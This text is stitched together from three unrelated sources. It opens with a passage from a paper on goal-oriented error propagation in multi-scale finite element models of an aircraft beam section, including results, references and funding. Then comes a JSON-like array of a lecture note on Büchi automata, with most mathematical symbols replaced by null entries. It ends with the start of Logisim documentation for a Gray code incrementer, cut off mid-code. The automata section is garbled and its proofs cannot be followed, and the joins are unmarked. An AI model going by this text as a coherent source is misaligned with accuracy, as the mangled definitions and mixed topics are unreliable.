When looking solely at the maximum stress, the error is less than $$2\\%$$, but the largest error is not located at the region of high stress.\n\nThe final simulation is the study of robustness in the multi-scale approach via the Monte Carlo sampling, resulting in the standard deviation field and the $$95\\%$$ confidence interval of the von Mises stress at the location of maximum stress. This location is at the top of the webbing section. The confidence interval for this location is $$220.0\\, \\pm \\, 8.8$$ MPa. This gives greater than $$95\\%$$ confidence that the maximum von Mises stress is below the yield criterion. In addition to this specific interval, the field of the standard deviation of the Monte Carlo samples for the webbing is shown in Fig. 8. One of the most interesting aspects of this standard deviation field is that it is localized to the edges, with a maximum standard deviation of 20.7 MPa. However, the locations of this large standard deviation do not occur near the area of maximum stress but near the location of maximum error.\n\n### Slotted hole design\n\nThe second design expands the small hole in the initial design into a 30 mm long slot. This extension of the circular hole into a slot is thought of as a design that can accommodate more sensors for testing and prototyping, for example adding a thermocouple near a pitot tube. The nominal stress and propagated error can be seen in Fig. 9. Both fields are very similar to those of the initial design feature, with even the same maximum values.\n\nIn addition to the same maximum values, the slotted feature also closely matches the general field. The main reason for this is the fact that the flange experiences low stress due to the loading and the use of thin elements. This same effect can be seen for the propagated GOEE as the error in the von Mises stress.
Both the nominal stress and the error fields look identical to the fields for the initial design.

Due to the low stresses on the flange, there is little difference between this design and the initial design. This is also seen in the Monte Carlo simulation, where the results were nearly identical to those of the initial design (within the error of the Monte Carlo simulation). This is primarily because no modifications were made to the areas of high stress. Because there are no identifiable differences, the slotted design results for the Monte Carlo simulation are not presented.

### Single webbing hole design

While the first two designs contain holes only in the flange section, the last two contain holes in both the flange and webbing sections, to get a better understanding of these design changes in areas of higher stress. This specific design puts a single 10 mm hole in the webbing section. The location of this hole is based on the knowledge gained from the previous two designs, which showed that holes in the flange do not make a large difference in any of the metrics used in this work for this specific loading case. To better test the methodology, the next two designs place holes near the areas of maximum stress. The nominal stress and error of the von Mises stress results for this design are shown in Fig. 10.

The first thing to observe in Fig. 10 is the addition of the webbing profile to better identify any stress concentration due to the additional hole. This is primarily used to highlight the location of the concentrations and as a comparison between the single and triple hole features. For the von Mises stress in Fig. 10a, the maximum stress is 289.7 MPa. The maximum stress for this single hole slightly exceeds the yield criterion of 265 MPa for this type of aluminium. With this stress value, it is believed that local plastic deformation would occur, but not cause a full failure.
It is important to note that this simulation only accounts for linear-elastic material properties. This is not a requirement of the multi-scale methodology, just of the current implementation. Since only linear-elastic behaviour is modelled, these results, when applied to a physical system, are only valid before yielding. Further nonlinear behaviour (such as plasticity) could be estimated in this analysis by a series of linear moduli; however, this would complicate the generation and utilization of the [M] matrix, requiring multiple [M] matrices and a custom interpolation algorithm between them. Doing this is theoretically possible but is beyond the scope of this work.

In addition to the increase in the maximum value, the stress field is also significantly different compared to the initial design. The difference is apparent in two main areas. The first is the location of the maximum stress: in the initial design, the maximum occurred on the upper edge, while for the single hole it is located at the top of the hole via a stress concentration. The second is an almost swirling effect, since the side of the hole has low stress that diffuses into the stress field. This is believed to be due partially to the size of the feature. It is believed that if the feature were expanded, there would be a more localized field adjustment as opposed to the mixing/swirling effect seen in Fig. 10a.

The other main aspect of Fig. 10 is the error in the von Mises stress in Fig. 10b. One interesting aspect is that the maximum error of 3.4 MPa is nearly identical to that of the initial design. The location of this error, however, is not solely located on the boundary; there is also an area of large error at the hole. One interesting aspect is the comparison between the stress concentration and the location of large error on the hole: there appears to be a rotation between these locations.
This rotation seems to be about $$37.5^\\circ$$, although the exact rotation is difficult to measure due to the FE approximation.

The final analysis is the Monte Carlo simulation to show the robustness of this design to uncertainty. For the location of maximum stress, the $$95\\%$$ confidence interval found is $$295.3 \\pm 8.6$$ MPa. While the nominal stress is larger than for the initial design, the variance is nearly the same. To better understand how these two designs have similar variances, the standard deviation field from this simulation is shown in Fig. 11. In general, this has the same features as the initial design, where the largest standard deviation is near the boundary, with a maximum of 20.3 MPa compared to 20.7 MPa. However, one difference is that there is a local area of high error near the hole. This localization increases the variation in the confidence interval but is still small compared to the maximum. The fact that the initial design and the single hole design have similar variances is believed to reflect a trade-off between Saint-Venant’s principle of being far away from the loading and the nature of the stress concentration.

### Triple webbing holes design

The final design presented in this work is a modification of the single webbing hole, replacing the single large hole with three 5 mm holes. The smaller holes are predicted to introduce a larger stress concentration, while using multiple holes allows the investigation of interactions between the fields/stress concentrations created by these multiple holes. The nominal stress and error of the von Mises stress results from this analysis can be seen in Fig. 12.

The first aspect of Fig. 12a that is noticeable is the maximum von Mises stress. This feature has a maximum von Mises stress of 315.1 MPa, which greatly exceeds the yield criterion. Looking at the webbing, the maximum stress occurs at the top of one of the holes.
While not modelled in this simulation, this large stress is expected to be near the ultimate strength and to cause a crack to form, resulting in a global failure compared to the local failure seen with the single hole design. If this design were presented to an analyst, it is expected that it would be rejected. Despite this, there is a large amount of information that can be gathered from this design.

One of the other aspects of interest in Fig. 12b is the interaction between the holes. The holes are 5 mm in diameter with the centres 10 mm apart. In general, these holes did not affect each other. In the lowest hole, the same swirling field as for the single hole (shown in “Single webbing hole design” Section) is present, with the same predicted cause based on the feature size.

The error of the von Mises stress in Fig. 12b shows some interesting aspects. Firstly, the maximum error is smaller than in the other designs, although by a small amount. The cause of this decrease is unknown, but it suggests an interesting trend where the larger the stress concentration, the smaller the error concentration. Future work is planned to identify whether this trend holds for the method in general or only for this specific model. The stress concentration is solely geometrically dependent, while the error concentration is both geometrically and numerically dependent, since the error is based on the mesh and is described in terms of a GOEE. Additionally, the same rotation between the stress and error concentrations as for the single hole is seen.

The final results for this design are from the Monte Carlo simulation. For the location of maximum stress, the $$95\\%$$ confidence interval is $$319.0 \\, \\pm \\, 17.9$$ MPa. The interval has about double the spread compared to the other designs. This increase is especially interesting considering the standard deviation field shown in Fig. 13.
For the entire design, the maximum standard deviation is 19.7 MPa compared to 20.7 MPa in the initial design. Despite this overall smaller variance, the maximum stress has a larger variance; this is due to the increased stress concentration in addition to the location being closer to the top edge.

### Discussion

The results from all of these feature models show that the global model is well-defined and introduces very little error into the feature model. These results highlight several aspects, the first being that the total error is small compared to the nominal stress. This tells the analyst that this modelling technique is well defined for this loading, even at the stress concentrations due to the holes. Another aspect is that the maximum error and the maximum stress do not necessarily coincide in physical space. For example, in the initial design the maximum stress occurs at the top of the webbing while the maximum error occurs near the intersection of the webbing and flange. While this is not a major issue, it is important to know, since typical mesh refinement is performed at the stress concentration, which might not be the location with the largest stress value once the effect of the error is considered. An exact reason for this is currently unknown and is being studied, but the error does follow the expected pattern of being largest at the boundary of the feature model. The error measurement is based on the global mesh, so it follows that the error will be largest at locations that coincide with the global mesh.

One of the most interesting findings in this work is the differences between the feature designs that contain webbing holes. The initial design showed that the area of high stress was on the webbing. For designs that contain holes/stress concentrations in that region, the nominal stress increases to and past the von Mises yield criterion. Despite this increase in stress, the GOEE propagated into the feature model did not show many differences.
The major difference is in the GOEE field around the webbing holes. While the maximum error is nearly identical for the various designs, the single hole and triple holes have a GOEE concentration at the holes similar to the stress concentration. The one aspect that differs between the error and stress concentrations is that there is a rotation around the hole. It is difficult to identify the rotation precisely due to the FE resolution, but it appears to be approximately $$37.5^\\circ$$.

The other main finding is the comparison of the robustness of the various feature models. This is done with Monte Carlo sampling of stochastic driving DoF. There are two major results from this simulation. The first is that the largest standard deviation of the feature model is located near the driven nodes. This showcases Saint-Venant’s principle: the farther away from the loading conditions, the smaller the effect of variation upon the stress. The second result is the effect of the feature design on the $$95\\%$$ confidence interval at the location of maximum von Mises stress. The initial design and the single hole have approximately the same confidence interval; a few factors contribute to this. The first factor is the location itself. For the initial design, the maximum location is on the top part of the webbing near the driven nodes, while for the single hole design it is located near the hole. With the location near the hole, there is a trade-off between the decrease due to the distance from the edge and the increase due to the stress concentration.
This trade-off is dominated by the stress concentration for the triple hole feature design due to the small size of the holes, thus producing the largest confidence interval and the largest von Mises stress.

## Conclusions

The work presented in this paper introduces a novel approach to propagate the uncertainty from the global model, using a custom element formulation, into the feature model by utilizing dual problems and multi-scale modelling. This provides information to the design engineer about the failure of complex areas without the need to perform large mesh refinements that are computationally infeasible. To demonstrate this methodology, this work takes a simplified beam section and evaluates four local feature designs. The global model experiences near-yielding stress via the von Mises criterion, while the initial design, which contains two holes in the flange section, does not experience any yielding. In addition to the stress, the error in the von Mises stress showed little error near the maximum stress, with the location of maximum error near the intersection of the webbing and flange sections of the feature. Planned future work is to introduce a Bayesian response surface through a Gaussian process to reduce the total number of dual problems performed, thus reducing the computational evaluation time with little to no decrease in accuracy.

In addition to the initial local feature design, three additional designs are tested in order to determine the sensitivity of the multi-scale modelling procedure and the error propagation. One design makes a modification to the initial holes, while the other two add holes to the webbing section. The nominal hole modification did not show any difference in the stress distribution and error field compared to the initial design. This is mainly due to the applied loading, since the elements do not have through-thickness stiffness due to the thin shell assumption.
To fully test this methodology, the other two features contain holes near the location of maximum stress. These holes increase the maximum stress to near and past the yielding criterion, resulting in one feature exhibiting gross yielding, suggesting a failed design if this system were considered for an industrial case. In addition, the quantified error shows high confidence in these results.

To test the robustness of the multi-scale methodology, some variance is added to the driving nodes to represent the use of sensors in the analysis that introduce errors not accounted for by the GOEE (such as instrumentation error, manufacturing tolerances, etc.). Using this variability, the $$95\\%$$ confidence interval for the location of maximum von Mises stress via a Monte Carlo simulation and the standard deviation field are compared between the different feature designs. These results show that the variability decreases as the distance from the driven nodes increases, showcasing Saint-Venant’s principle. However, one aspect observed is that the greater the stress concentration, the larger the confidence interval, despite the location not being near the driven nodes where the largest variance is identified.

## Availability of data and materials

The datasets used and/or analysed during the current study are available from the corresponding author on reasonable request.

## References

1. Oden JT, Prudhomme S. Estimation of modeling error in computational mechanics. Journal of Computational Physics. 2002;182:496–515.

2. Ainsworth M, Oden JT. A posteriori error estimation in finite element analysis. Computer Methods in Applied Mechanics and Engineering. 1997;142(1):1–88.

3. Grätsch T, Bathe K-J. A posteriori error estimation techniques in practical finite element analysis. Computers & Structures. 2005;83(4):235–65.

4. Eriksson K, Johnson C. Adaptive finite element methods for parabolic problems I: A linear model problem.
SIAM Journal on Numerical Analysis. 1991;28:43–77.\n\n5. Verfürth R. A posteriori error estimation and adaptive mesh-refinement techniques. Journal of Computational and Applied Mathematics. 1994;50(1):67–83.\n\n6. Bank JE, Weiser A. Some a posteriori error estimators for elliptic partial differential equations. Mathematics of Computation. 1985;44:283–301.\n\n7. Larsson F, Runesson K. On two-scale adaptive fe analysis of micro-heterogeneous media with seamless scale-bridging. Computer Methods in Applied Mechanics and Engineering. 2011;200(37):2662–74.\n\n8. Zhang J, Natarajan S, Ooi ET, Song C. Adaptive analysis using scaled boundary finite element method in 3d. Computer Methods in Applied Mechanics and Engineering. 2020;372:113374.\n\n9. Song C, Ooi ET, Pramod ALN, Natarajan S. A novel error indicator and an adaptive refinement technique using the scaled boundary finite element method. Engineering Analysis with Boundary Elements. 2018;94:10–24.\n\n10. Allendes A, Naranjo C, Otárola E. Stabilized finite element approximations for a generalized boussinesq problem: A posteriori error analysis. Computer Methods in Applied Mechanics and Engineering. 2020;361:112703.\n\n11. Bi C, Wang C, Lin Y. Two-grid finite element method and its a posteriori error estimates for a nonmonotone quasilinear elliptic problem under minimal regularity of data. Computers & Mathematics with Applications. 2018;76(1):98–112.\n\n12. Heltai L, Rotundo N. Error estimates in weighted sobolev norms for finite element immersed interface methods. Computers & Mathematics with Applications. 2019;78(11):3586–604.\n\n13. Rech M, Sauter S, Smolianski A. Two-scale composite finite element method for dirichlet problems on complicated domains. Numerische Mathematik. 2006;102:681–708.\n\n14. Pramanick T, Sinha RK. Error estimates for two-scale composite finite element approximations of parabolic equations with measure data in time for convex and nonconvex polygonal domains. Applied Numerical Mathematics. 
2019;143:112–32.\n\n15. Cai Z, Kim S, Lee H-C. Error estimate of a finite element method using stress intensity factor. Computers & Mathematics with Applications. 2018;76(10):2402–8.\n\n16. Lin Z, Zhuang Z, You X, Wang H, Xu D. Enriched goal-oriented error estimation applied to fracture mechanics problems solved by xfem. Acta Mechanica Solida Sinica. 2012;25(4):393–403.\n\n17. Ainsworth M, Oden JT. A unified approach to a posteriori error estimation using element residual methods. Numerische Mathematik. 1993;65:23–50.\n\n18. Ladevèze P, Rougeot P, Blanchard P, Moreau JP. Local error estimators for finite element linear analysis. Computer Methods in Applied Mechanics and Engineering. 1999;176(1):231–46.\n\n19. Ferreira MAR, Lee H. Multiscale Modeling: A Bayesian Perspective. New York, USA: Springer; 2007.\n\n20. Weinan E. Principles of Multiscale Modeling. Cambridge, UK: Cambridge University Press; 2011.\n\n21. Guinard S, Bouclier R, Toniolli M, Passieux J-C. Multiscale analysis of complex aeronautical structures using robust non-intrusive coupling. Advanced Modeling and Simulation in Engineering Sciences. 2018;5:1–27.\n\n22. Said BE, Daghia F, Ivanov D, Hallett SR. An iterative multiscale modelling approach for nonlinear analysis of 3D composites. International Journal of Solids and Structures. 2018;132–133:42–58.\n\n23. Sturm R, Schatrow P, Klett Y. Multiscale modeling methods for analysis of failure modes in foldcore sandwich panels. Applied Composite Materials. 2015;22:857–68.\n\n24. Lua J, Gregory W, Sankar J. Multi-scale dynamic failure prediction tool for marine composite structures. Journal of Materials Science. 2006;41:6673–92.\n\n25. Addessi D, Sacco E. A multi-scale enriched model for the analysis of masonry panels. International Journal of Solids and Structures. 2012;49:865–80.\n\n26. Geers MGD, Kouznetsova VG, Matouš K, Yvonnet J. Homogenization methods and multiscale modeling: nonlinear problems. 
Encyclopedia of Computational Mechanics Second Edition, 2017; 1-34.\n\n27. Kim HJ, Swan CC. Voxel-based meshing and unit-cell analysis of textile composites. International Journal of Numerical Methods in Engineering. 2003;56:977–1006.\n\n28. Gendre L, Allix O, Gosselet P. A two-scale approximation of the schur complement and its use for non-intrusive coupling. International Journal for Numerical Methods in Engineering. 2011;87(9):889–905.\n\n29. Kerfriden P, Allix O, Gosselet P. A three-scale domain decomposition method for the 3D analysis of debonding in laminates. Computational Mechanics. 2009;44:343–62.\n\n30. Gosselet P, Rey C. Non-overlapping domain decomposition methods in structural mechanics. Archives of Computational Methods in Engineering. 2006;13:515–72.\n\n31. Zou X, Yan S, Rouse JP, Jones IA, Hamadi M, Fouinneteau M. A computationally efficient approach for analysing the onset of failure in aerospace composite structures. ICCM22, Melbourne, Australia 2019.\n\n32. Tirvaudey M, Chamoin L, Bouclier R, Passieux J-C. A posteriori error estimation and adaptivity in non-intrusive couplings between concurrent models. Computer Methods in Applied Mechanics and Engineering. 2020;367:113104.\n\n33. Paladim DA, Moitinho-de-Almeida JP, Bordas SPA, Kerfriden P. Guaranteed error bounds in homogenisation: an optimum stochastic approach to preserve the numerical separation of scales. International Journal for Numerical Methods in Engineering. 2017;110(2):103–32.\n\n34. Liang B, Zhang W, Fenner JS, Gao J, Shi Y, Zeng D, Su X, Liu WK, Cao J. Multi-scale modeling of mechanical behavior of cured woven textile composites accounting for the influence of yarn angle variation. Composites Part A: Applied Science and Manufacturing. 2019;124:105460.\n\n35. Shi B, Zhang M, Liu S, Sun B, Gu B. Multi-scale ageing mechanisms of 3D four directional and five directional braided composites’ impact fracture behaviors under thermo-oxidative environment. 
International Journal of Mechanical Sciences. 2019;155:50–65.\n\n36. Liu G, Zhang L, Guo L, Liao F, Zheng T, Zhong S. Multi-scale progressive failure simulation of 3D woven composites under uniaxial tension. Composite Structures. 2019;208:233–43.\n\n37. Chung ET, Leung WT, Pollock S. Goal-oriented adaptivity for gmsfem. Journal of Computational and Applied Mathematics. 2016;296:625–37.\n\n38. Chamoin L, Legoll F. Goal-oriented error estimation and adaptivity in msfem computations. arXiv preprint arXiv:1908.00367v1 2019.\n\n39. Zou X, Yan S, Rouse J, Matveev M, Li S, Jones IA, Hamadi M, Fouinneteau M. The identification of failure initiation hotspots in idealised composite material component models using a “bottom-up database” method. Proceedings of the 18th European Conference on Composite Materials 2018.\n\n40. Zou X, Yan S, Matveev M, Rouse JP, Jones IA, Hamadi M, Fouinneteau M. Comparison of interface modelling strategies for predicting delamination in composite l-angle sections under four-point bending. composite structures. Journal of Composite Structures 2019 Submitted.\n\n41. Bonney, M.S., Evans, R., Rouse, J., Jones, A., Hamadi, M.: Bayesian reconstruction of goal orientated error fields in large aerospace finite element models. In: Proceedings of the Aerospace Europe Conference 2020. 2020.\n\n42. Oden JT, Prudhomme S. Goal-oriented error estimation and adaptivity for the finite element method. Computers & Mathematics with Applications. 2001;41(5):735–56.\n\n43. Becker R, Rannacher R. An optimal control approach to a posteriori error estimation in finite element methods. Acta numerica. 2001;10(1):1–102.\n\n44. Andrés González Estrada O, Nadal E, Ródenas JJ, Kerfriden P, Pierre-Alain Bordas S, Fuenmayor FJ. Mesh adaptivity driven by goal-oriented locally equilibrated superconvergent patch recovery ; 2012, arXiv e-prints .\n\n45. Cirak F, Ramm E. A posteriori error estimation and adaptivity for linear elasticity using the reciprocal theorem. 
Computer Methods in Applied Mechanics and Engineering. 1998;156(1):351–62.\n\n46. Van der Zee K, Verhoosel C. Isogeometric analysis-based goal-oriented error estimation for free-boundary problems. Finite Elements in Analysis and Design. 2011;47(6):600–9.\n\n47. Larsson F, Hansbo P, Runesson K. Strategies for computing goal-oriented a posteriori error measures in non-linear elasticity. International Journal for Numerical Methods in Engineering. 2002;55(8):879–94.\n\n48. Grätsch T, Bathe K-J. A posteriori error estimation techniques in practical finite element analysis. Computers & structures. 2005;83(4–5):235–65.\n\n49. Ainsworth M, Zhu J, Craig A, Zienkiewicz O. Analysis of the zienkiewicz-zhu a-posteriori error estimator in the finite element method. International Journal for numerical methods in engineering. 1989;28(9):2161–74.\n\n50. Zhu J, Zienkiewicz O. Adaptive techniques in the finite element method. Communications in applied numerical methods. 1988;4(2):197–204.\n\n51. Zienkiewicz OC, Zhu JZ. A simple error estimator and adaptive procedure for practical engineering analysis. International journal for numerical methods in engineering. 1987;24(2):337–57.\n\n52. González-Estrada OA, Nadal E, Ródenas J, Kerfriden P, Bordas SP-A, Fuenmayor F. Mesh adaptivity driven by goal-oriented locally equilibrated superconvergent patch recovery. Computational Mechanics. 2014;53(5):957–76.\n\n53. ABAQUS/standard User’s Manual. Version 2019. United States: Dassault Systems Simulia Corporation; 2019.\n\n54. Dvorkin EN, Bathe K-J. A continuum mechanics based four-node shell element for general non-linear analysis. Engineering computations. 1984;1(1):77–88.\n\n55. Bathe K-J, Dvorkin EN. A formulation of general shell elements-the use of mixed interpolation of tensorial components. International journal for numerical methods in engineering. 1986;22(3):697–722.\n\n56. Oñate E. Structural Analysis with the Finite Element Method. Linear Statics: Volume 2: Beams, Plates and Shells. 
Springer, Barcelona, Spain 2013.

57. Bathe K-J, Dvorkin EN. A four-node plate bending element based on mindlin/reissner plate theory and a mixed interpolation. International Journal for Numerical Methods in Engineering. 1985;21(2):367–83.

58. Cook RD, Malkus DS, Plesha ME, Witt RJ. Concepts and Applications of Finite Element Analysis. 4th ed. New York, USA: Wiley; 2001.

59. Ibrahimbegovic A, Taylor RL, Wilson EL. A robust quadrilateral membrane finite element with drilling degrees of freedom. 1990.

60. Knight NF, Rankin CC. STAGS example problems manual. 2013.

61. Ko Y, Lee P-S, Bathe K-J. The MITC4+ shell element and its performance. Computers and Structures. 2016;169:57–68.

62. Jun H, Mukai P, Kim S. Benchmark tests of MITC triangular shell elements. Structural Engineering and Mechanics. 2018;68(1):17–38.

63. MacNeal RH, Wilson CT, Harder RL, Hoff CC. The treatment of shell normals in finite element analysis. Finite elements in analysis and design. 1998;30(3):235–42.

64. Zienkiewicz OC, Taylor RL. The finite element method. 5th ed. Bautechnik. 2002;79(2):122–3.

65. Huerta A, Díez P. Implicit residual type error estimators. Springer; 2016. p. 19–32.

## Funding

This project is funded by the Clean Sky 2 Joint Undertaking under the European Union’s Horizon 2020 research and innovation program under grant agreement No 754581.

## Author information

Authors

### Contributions

JR and PK developed the methodology for the GOEE approach used in this work. RE implemented and developed the FE solution used to gather the additional information. MB implemented the full methodology, developed the test system, and drafted the paper. AJ and MH provided project guidance for MARQUESS.
All authors read and approved the final manuscript.

### Corresponding author

Correspondence to James Rouse.

## Ethics declarations

### Competing interests

The authors declare that they have no competing interests.

### Publisher's Note

Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.

## Appendix A: MARQUESS

The work presented in this paper is part of the Multi-scale Analysis of AiRframe Structures and Quantification of UncErtaintieS System (MARQUESS) project. MARQUESS is a collaborative work between the University of Nottingham and Airbus, funded through the Clean Sky 2 program. It is designed to be a plug-in for ABAQUS to analyse the multi-scale nature of aerospace components and identify possible locations of failure. The method that MARQUESS uses to identify these locations is a combined bottom-up (also known as feature modelling) and top-down approach. One of the main aspects of the MARQUESS workflow is the pre-computed sub-models. These use a linear superposition of the unit-deflection-normalized desired results (such as stress components) at the boundary of the sub-model, then calculate various failure criteria such as delamination or yielding.

While this work is part of the MARQUESS project, it does not use the plug-in. Despite this, the same procedure is used in a separate standalone program with a different failure criterion due to the current implementation. The pre-computed sub-model is generated manually using the exact same approach that is used for the plug-in.
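The superposition of pre-computed sub-model responses described above amounts to a single matrix-vector product. The sketch below is an illustration under assumed names and shapes, not the plug-in's actual interface: each column of `M` is the result field produced by a unit displacement of one boundary DoF.

```python
import numpy as np

def submodel_response(M, u_boundary):
    """Superpose pre-computed unit-deflection results: column j of M is
    the desired result field (e.g. a stress component at each output
    point) for a unit displacement of boundary DoF j, so the total
    response is linear in the driving boundary displacements."""
    return M @ u_boundary

# toy example: 2 result quantities, 3 boundary DoF (values illustrative)
M = np.array([[1.0, 0.5, 0.0],
              [0.0, 2.0, 1.0]])
sigma = submodel_response(M, np.array([1.0, 1.0, 2.0]))  # -> [1.5, 4.0]
```

Because the map is linear, uncertainty in the driving DoF propagates directly: a perturbation `du` of the boundary displacements changes the response by exactly `M @ du`.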
It is noted that the final version of the MARQUESS plug-in will incorporate the GOEE methodology used in this work.

## Rights and permissions

Open Access This article is licensed under a Creative Commons Attribution 4.0 International License, which permits use, sharing, adaptation, distribution and reproduction in any medium or format, as long as you give appropriate credit to the original author(s) and the source, provide a link to the Creative Commons licence, and indicate if changes were made. The images or other third party material in this article are included in the article’s Creative Commons licence, unless indicated otherwise in a credit line to the material. If material is not included in the article’s Creative Commons licence and your intended use is not permitted by statutory regulation or exceeds the permitted use, you will need to obtain permission directly from the copyright holder. To view a copy of this licence, visit http://creativecommons.org/licenses/by/4.0/.

Reprints and Permissions
[ "Mikołaj Bojańczyk\n\n## 6. Büchi automata\n\nAn", null, "-word is a word where positions are indexed by natural numbers. We write", null, "for the set of", null, "-words over an alphabet", null, ". To recognise languages of", null, "-words, we use Büchi automata (we will later move a monoid style).\n\nBüchi automata. A nondeterministic Büchi automaton has the same syntax as a nondeterministic automaton over finite words (say, without", null, "-transitions), i.e. it is a tuple", null, "where", null, "consisting of  states, the input alphabet, initial states, final states, and transitions. Such an automaton accepts an", null, "-word if it admits some run which begins in an intial state and visits final states infinitely often. Call a language", null, "-regular if it is recognised by some nondeterministic Büchi automaton.\n\nExample. The obvious question is: what about deterministic Büchi automataAs it turns out, these are too weak. Indeed, consider the set of", null, "-words over alphabet", null, "where the letter", null, "appears finitely often, this set can be described by the expression", null, ". Here is a picture of a nondeterministic Büchi automaton that recognises this language:\n\nWe claim that no deterministic Büchi automaton recognises this language. Suppose that there would be such an automaton. Run this automaton on the word", null, ". Since this word contains finitely many", null, "‘s, it should be accepted, and therefore an accepting state should be used after reading some finite prefix", null, ". Consider now the word", null, ". Again this word should be accepted, and therefore there should be some", null, "such that an accepting state is seen after reading", null, ". Iterating this construction, we get an", null, "-word of the form", null, "such that the automaton visits an accepting state before every", null, ", and therefore accepts, despite the word having infinitely many", null, "‘s. 
Note how we crucially used determinism – by assuming that changing a suffix of the word does not change the run on a prefix.", null, "The automaton monoid and linked pairs\n\nOur goal is to prove that nondeterministic Büchi automata are closed under complementation, and then a form determinisation: namely nondeterministic Büchi automata are equivalent to Boolean combinations of deterministic Büchi automata. Before proving these results, we show how to associate to each nondeterministic Büchi automaton a monoid homomorphism.\n\nThe automaton homomorphism. Consider a nondeterministic Büchi automaton with states", null, ". For a finite run", null, "(i.e. a finite sequence of transitions), define the profile of the run to be the triple in", null, "such that the first coordinate is the source state, the last coordinate is the target state, and the middle coordinate says whether or not the run contains an accepting state (1 means yes). For a finite input word", null, ", define it profile", null, "to be the set of all profiles of finite runs over this word. It is not difficult to see that the profile function", null, "is compositional, and  therefore its image, call it", null, ", can be equipped with a monoid structure so that", null, "becomes a monoid homomorphism. This monoid homomorphism is called the automaton homomorphism associated to the automaton.\n\nLinked pairs and factorisations. Define a linked pair in the monoid", null, "to be a pair of elements", null, "such that", null, "and", null, ". This notion makes sense in any monoid, but the following notion of accepting linked pair is specific to the monoid defined above. 
Define a linked pair to be accepting if there are some states", null, "such that", null, "is initial and  the elements", null, ", when seen as sets of triples, satisfy", null, "If a linked pair is not accepting, then it is called rejecting.\n\nFor", null, "and", null, ", define an", null, "-factorisation of", null, "to be a factorisation", null, "into nonempty words such that", null, "and", null, "Note that the existence of such a factorisation implies that", null, "is a linked pair.\n\nBüchi Linked Pair Lemma. A word", null, "is rejected if and only if it admits an", null, "-factorisation for some rejecting linked pair", null, ".\n\nProof. Suppose that", null, "is rejected. Apply the Ramsey theorem, yielding some", null, "-factorisation for some linked pair. Clearly this pair must be rejecting, since otherwise we could construct an accepting run for", null, ". For the converse implication, suppose that", null, "admits an", null, "-factorisation, say", null, "for some rejecting linked pair. Define", null, "to be the position at the beginning of the word", null, ", in particular", null, "is the first position. We claim that there cannot be any accepting run on", null, ". Toward a contradiction, suppose that", null, "does admit an accepting run, call it", null, ". If", null, "is accepting, then by the pigeonhole principle one can find some", null, "such that accepting states are seen between", null, "and", null, ", and the same state, call it", null, ", is seen in positions", null, "and", null, ". This means that there is some initial state", null, "that the word", null, "admits a run of profile", null, ". 
In other words, we have", null, "By the same kind of reasoning, we conclude that", null, "and therefore the linked pair", null, "is accepting, contradicting our assumption.", null, "Complementation of Büchi automata\n\nAs an application of the automaton homomorphism, we prove that languages recognised by nondeterministic Büchi automata are closed under complementation. This is Büchi’s original proof of the result. We will also use the same ideas to prove determinisation, which is done here.\n\nTheorem. For every nondeterministic Büchi automaton, the complement of its language is recognised by a nondeterministic Büchi automaton.\n\nProof. Consider a language", null, "recognised by a nondeterministic Büchi automaton, and let", null, "be the automaton homomorphism corresponding to this automaton. By the Büchi Linked Pair Lemma, the complement of", null, "is equal to", null, "with the union ranging over rejecting linked pairs. The above language is easily seen to be recognised by a nondeterministic Büchi automaton.", null, "" ]
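The profile construction is easy to compute by machine on ultimately periodic words u·v^ω. The sketch below (Python) encodes the "finitely many a's" automaton from the example; the concrete encoding (states 0 and 1, transitions, accepting set) is our own assumption, since the original picture is not reproduced here:

```python
# Profile-based acceptance check for ultimately periodic omega-words,
# following the "automaton homomorphism" idea in the text.
STATES = {0, 1}
TRANS = {(0, "a"): {0}, (0, "b"): {0, 1}, (1, "b"): {1}}  # illustrative encoding
INITIAL, ACCEPTING = {0}, {1}

def letter_profile(c):
    """Profiles (source, saw-accepting?, target) of one-letter runs."""
    return {(p, p in ACCEPTING or q in ACCEPTING, q)
            for (p, c2), targets in TRANS.items() if c2 == c
            for q in targets}

def compose(p1, p2):
    """Profile of a concatenation: glue runs at a common middle state."""
    return {(p, b1 or b2, r)
            for (p, b1, q) in p1 for (q2, b2, r) in p2 if q == q2}

def profile(word):
    prof = {(q, q in ACCEPTING, q) for q in STATES}  # empty-word identity
    for c in word:
        prof = compose(prof, letter_profile(c))
    return prof

def accepts_lasso(u, v):
    """The automaton accepts u v^omega iff some state q is reachable from an
    initial state on u v^k, and some power v^m loops q -> q while visiting
    an accepting state (a lasso)."""
    reach = {q for (p, _, q) in profile(u) if p in INITIAL}
    while True:                      # close reach under reading copies of v
        step = {q for (p, _, q) in profile(v) if p in reach}
        if step <= reach:
            break
        reach |= step
    pv = profile(v)                  # union of profiles of v, v^2, v^3, ...
    closure = set(pv)
    while True:
        more = compose(closure, pv)
        if more <= closure:
            break
        closure |= more
    return any((q, True, q) in closure for q in reach)
```

For instance `accepts_lasso("ab", "b")` holds (one a, then only b's) while `accepts_lasso("", "ab")` does not (infinitely many a's).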
http://www.cburch.com/logisim/docs/2.7/en/html/guide/jar/incr.html
# Gray Code Incrementer

Each component included in a library is defined by creating a subclass of `InstanceFactory`, found in the `com.cburch.logisim.instance` package. This subclass has all the code involved.

(Here we're describing the API for the current version of Logisim. You may find some libraries developed for older versions of Logisim, in which components were developed by defining two classes, one extending `Component` and another extending `ComponentFactory`. Version 2.3.0 introduced the much simpler `InstanceFactory` API; the older technique is deprecated.)

Three Logisim packages define most of the classes relevant to defining component libraries.

`com.cburch.logisim.instance`

Contains classes specifically related to defining components, including the `InstanceFactory`, `InstanceState`, `InstancePainter`, and `Instance` classes.

`com.cburch.logisim.data`

Contains classes related to data elements associated with components, such as the `Bounds` class for representing bounding rectangles or the `Value` class for representing values that can exist on a wire.

`com.cburch.logisim.tools`

Contains classes related to the library definition.

Before we go on, let me briefly describe the Gray code on which these examples are based. It's not really important to understanding how these examples work, so you can safely skip to the code below if you wish - particularly if you already know Gray codes.

Gray code is a technique (named after Frank Gray) for iterating through n-bit sequences with only one bit changed for each step. As an example, consider the 4-bit Gray code listed below.

```
0000 0001 0011 0010 0110 0111 0101 0100
1100 1101 1111 1110 1010 1011 1001 1000
```

Each value has one bit (underlined in the original page) that will change for the next value in the sequence. For example, after 0000 comes 0001, in which the final bit has been toggled.

Logisim's built-in components don't include anything working with Gray codes. But electronics designers find Gray codes useful sometimes. One particularly notable instance of Gray codes is along the axes in Karnaugh maps.

## GrayIncrementer

This is a minimal example illustrating the essential elements to defining a component. This particular component is an incrementer, which takes a multibit input and produces the next Gray code following it in sequence.

```java
package com.cburch.gray;

import com.cburch.logisim.data.Attribute;
import com.cburch.logisim.data.BitWidth;
